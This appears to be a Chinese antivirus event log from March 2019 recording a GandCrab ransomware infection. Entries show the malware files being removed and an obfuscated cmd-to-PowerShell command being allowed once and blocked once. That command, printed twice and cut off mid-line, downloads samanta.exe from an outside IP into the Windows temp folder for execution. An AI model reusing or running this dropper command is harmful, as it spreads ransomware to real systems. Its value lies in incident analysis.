【1】2019-03-13 15:58:28,病毒防御,恶意行为监控,发现未知病毒BEHAV:Ransom/Rattrap.A, 已清除
病毒名称:BEHAV:Ransom/Rattrap.A
文件路径:C:\Users\Admin\Desktop\GandCrab5.213\samanta.exe
用户操作:已清除
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【2】2019-03-13 15:56:50,病毒防御,恶意行为监控,发现未知病毒BEHAV:Ransom/Rattrap.A, 已清除
病毒名称:BEHAV:Ransom/Rattrap.A
文件路径:C:\windows\temp\191.exe
用户操作:已清除
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【3】2019-03-13 15:56:34,系统防御,自定义防护,cmd.exe触犯自定义文件防护规则, 已允许
操作者:C:\windows\SysWOW64\cmd.exe
命令行:c:\windows\system32\cmd /c set p=power&& set s=shell&& call %p%%s% $RAZY83lq = '$zDTzYNWK8 = new-obj-122533090-465901954-1104848796ect -com-122533090-465901954-1104848796obj-122533090-465901954-1104848796ect wsc-122533090-465901954-1104848796ript.she-122533090-465901954-1104848796ll;$qWGZblF = new-object sys-122533090-465901954-1104848796tem.net.web-122533090-465901954-1104848796client;$gNR1Y = new-object random;$YJ5WjlFc = \"-122533090-465901954-1104848796h-122533090-465901954-1104848796t-122533090-465901954-1104848796t-122533090-465901954-1104848796p-122533090-465901954-1104848796://205.185.125.109/samanta.exe\".spl-122533090-465901954-1104848796it(\",\");$SND7j = $gNR1Y.nex-122533090-465901954-1104848796t(1, 65536);$vPw8tqgia = \"c:\win-122533090-465901954-1104848796dows\tem-122533090-465901954-1104848796p\191.ex-122533090-465901954-1104848796e\";for-122533090-465901954-1104848796each($mFtaPgz in $YJ5WjlFc){try{$qWGZblF.dow-122533090-465901954-1104848796nlo-122533090-465901954-1104848796adf-122533090-4659
触犯规则:阻止CMD风险操作
操作类型:执行
操作文件:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
用户操作:已允许
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【4】2019-03-13 15:56:00,系统防御,自定义防护,cmd.exe触犯自定义文件防护规则, 已阻止
操作者:C:\windows\SysWOW64\cmd.exe
命令行:c:\windows\system32\cmd /c set p=power&& set s=shell&& call %p%%s% $RAZY83lq = '$zDTzYNWK8 = new-obj-122533090-465901954-1104848796ect -com-122533090-465901954-1104848796obj-122533090-465901954-1104848796ect wsc-122533090-465901954-1104848796ript.she-122533090-465901954-1104848796ll;$qWGZblF = new-object sys-122533090-465901954-1104848796tem.net.web-122533090-465901954-1104848796client;$gNR1Y = new-object random;$YJ5WjlFc = \"-122533090-465901954-1104848796h-122533090-465901954-1104848796t-122533090-465901954-1104848796t-122533090-465901954-1104848796p-122533090-465901954-1104848796://205.185.125.109/samanta.exe\".spl-122533090-465901954-1104848796it(\",\");$SND7j = $gNR1Y.nex-122533090-465901954-1104848796t(1, 65536);$vPw8tqgia = \"c:\win-122533090-465901954-1104848796dows\tem-122533090-465901954-1104848796p\191.ex-122533090-465901954-1104848796e\";for-122533090-465901954-1104848796each($mFtaPgz in $YJ5WjlFc){try{$qWGZblF.dow-122533090-465901954-1104848796nlo-122533090-465901954-1104848796adf-122533090-4659
触犯规则:阻止CMD风险操作
操作类型:执行
操作文件:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
用户操作:已阻止 |